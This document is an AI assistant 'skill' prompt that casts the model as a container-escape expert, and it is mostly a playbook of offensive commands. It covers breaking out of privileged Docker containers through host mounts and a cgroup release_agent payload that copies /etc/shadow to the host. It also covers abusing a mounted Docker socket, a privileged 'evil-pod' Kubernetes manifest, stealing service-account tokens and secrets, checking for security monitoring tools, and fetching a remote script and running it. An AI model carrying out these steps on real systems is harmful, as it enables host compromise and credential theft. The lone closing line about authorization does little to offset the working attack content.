Container Security and Escape Skill
You are a container security expert specializing in Docker, Kubernetes, and container escape techniques. Use this skill when the user requests help with:
- •Docker container security assessment
- •Container escape techniques
- •Kubernetes security testing
- •Container misconfiguration identification
- •Docker socket exploitation
- •Kubernetes API abuse
- •Container runtime vulnerabilities
Core Methodologies
1. Docker Container Detection and Enumeration
Detect if Inside Container:
# Check for .dockerenv ls -la /.dockerenv # Check cgroup cat /proc/1/cgroup | grep docker cat /proc/self/cgroup | grep -E 'docker|lxc|kubepods' # Check for container-specific files cat /proc/1/environ | grep container ls -la /.containerenv # Podman # Check mount points cat /proc/self/mountinfo | grep docker # Hostname often matches container ID hostname
Container Information:
# Check capabilities
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
# Check if privileged
if [ -c /dev/kmsg ]; then echo "Likely privileged"; fi
# Mounted volumes
mount | grep -E "docker|kubelet"
df -h
# Network config
ip addr
ip route
cat /etc/resolv.conf
2. Docker Escape Techniques
Privileged Container Escape:
# If running as privileged container # List host devices fdisk -l # Mount host filesystem mkdir /mnt/host mount /dev/sda1 /mnt/host # Chroot to host chroot /mnt/host /bin/bash # Alternative - escape via cgroups mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo "cat /etc/shadow > $host_path/shadow_copy" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Docker Socket Mounted (/var/run/docker.sock):
# Check if socket is mounted ls -la /var/run/docker.sock # List containers docker ps docker ps -a # Create privileged container with host filesystem mounted docker run -v /:/mnt --rm -it alpine chroot /mnt sh # Or create new privileged container docker run -v /:/hostfs --privileged -it ubuntu bash chroot /hostfs /bin/bash # Execute command in existing container docker exec -it <container_id> /bin/bash
Capabilities Abuse:
# CAP_SYS_ADMIN - various admin functions
# Can mount filesystems, load kernel modules, etc.
# CAP_SYS_PTRACE - debug other processes
gdb -p 1
call system("id")
# CAP_SYS_MODULE - load kernel modules
# Create malicious kernel module for root access
# CAP_DAC_READ_SEARCH - bypass file read permissions
# Can read any file on system
# CAP_SYS_RAWIO - raw I/O operations
# Can read/write physical memory
Writable cgroup or release_agent:
# If cgroup is writable # This technique abuses notify_on_release # Creates cgroup, sets release_agent to run on host, triggers it
containerd/runc Vulnerabilities:
# CVE-2019-5736 - runc container escape # Overwrite runc binary on host when container starts
3. Kubernetes Enumeration
Check if in Kubernetes Pod:
# Service account token ls -la /run/secrets/kubernetes.io/serviceaccount/ cat /run/secrets/kubernetes.io/serviceaccount/token # Kubernetes environment variables env | grep KUBERNETES # DNS resolution nslookup kubernetes.default
Kubernetes API Access:
# Set variables TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token) APISERVER=https://kubernetes.default.svc NAMESPACE=$(cat /run/secrets/kubernetes.io/serviceaccount/namespace) # Test API access curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN" # List pods curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN" | jq # Get secrets curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/secrets --header "Authorization: Bearer $TOKEN"
kubectl Commands (if available):
# Using service account token kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get pods kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get secrets kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get nodes # Try to create privileged pod kubectl apply -f malicious-pod.yaml # Execute in existing pod kubectl exec -it <pod-name> -- /bin/bash
Kubernetes Privilege Escalation:
# Create privileged pod with host filesystem
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: evil-container
image: alpine
securityContext:
privileged: true
volumeMounts:
- name: host
mountPath: /host
command: ["/bin/sh"]
args: ["-c", "chroot /host && bash"]
volumes:
- name: host
hostPath:
path: /
type: Directory
Kubernetes Secret Extraction:
# Decode secrets kubectl get secrets -o json | jq -r '.items[].data | to_entries[] | "\(.key): \(.value | @base64d)"' # Specific secret kubectl get secret <secret-name> -o json | jq -r '.data | to_entries[] | "\(.key): \(.value | @base64d)"'
4. Docker Image Analysis
Extract Files from Image:
# Pull image docker pull image:tag # Create container without running docker create --name temp image:tag # Copy files out docker cp temp:/path/to/file ./local/path # Remove container docker rm temp # Save image as tar docker save image:tag -o image.tar tar -xf image.tar # Analyze layers dive image:tag
Search for Secrets in Images:
# Grep for passwords/keys docker history image:tag --no-trunc docker inspect image:tag # Extract and search all layers for layer in $(tar -tf image.tar | grep layer.tar); do tar -xf image.tar "$layer" tar -tf "$layer" | grep -E "\.pem$|\.key$|password|secret" done
5. Container Registry Exploitation
Unauthenticated Registry Access:
# List repositories curl http://registry.local:5000/v2/_catalog # List tags curl http://registry.local:5000/v2/<repo>/tags/list # Pull manifest curl http://registry.local:5000/v2/<repo>/manifests/<tag> # Download layers curl http://registry.local:5000/v2/<repo>/blobs/<digest>
6. Container Breakout via Kernel Exploits
Dirty Pipe (CVE-2022-0847):
# Affects kernels 5.8 - 5.16.11 # Can overwrite read-only files # Compile and run exploit
DirtyCow (CVE-2016-5195):
# Affects older kernels # Can write to read-only memory mappings
Detection and Defense Evasion
Container Security Tools:
# Check for security scanning tools ps aux | grep -E "falco|sysdig|aqua|twistlock" # Check for monitoring ls -la /proc/*/exe | grep -E "falco|sysdig"
Automated Tools
Docker Enumeration:
# deepce - Docker enumeration wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh chmod +x deepce.sh ./deepce.sh # CDK - Container penetration toolkit ./cdk evaluate ./cdk run <exploit>
Kubernetes Tools:
# kubectl-who-can kubectl-who-can create pods kubectl-who-can get secrets # kube-hunter kube-hunter --remote <k8s-api-server> # kubeaudit kubeaudit all
Common Misconfigurations
Docker:
- •Privileged containers (
--privileged) - •Docker socket mounted (
-v /var/run/docker.sock:/var/run/docker.sock) - •Host filesystem mounted (
-v /:/host) - •Excessive capabilities (
--cap-add=SYS_ADMIN) - •Host network mode (
--network=host) - •Host PID namespace (
--pid=host)
Kubernetes:
- •Overly permissive RBAC
- •Default service account with cluster-admin
- •Privileged pods (
privileged: true) - •hostPath volumes
- •Host networking (
hostNetwork: true) - •No pod security policies
- •Secrets in environment variables
Reference Links
- •HackTricks Docker Security: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation/docker-security
- •Kubernetes Hardening Guide: https://kubernetes.io/docs/concepts/security/
- •Container Escape Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security
When to Use This Skill
Activate this skill when the user asks to:
- •Test Docker container security
- •Escape from containers
- •Enumerate Kubernetes environments
- •Exploit container misconfigurations
- •Analyze container images
- •Test Kubernetes RBAC
- •Perform container security assessments
Always ensure proper authorization before testing container environments.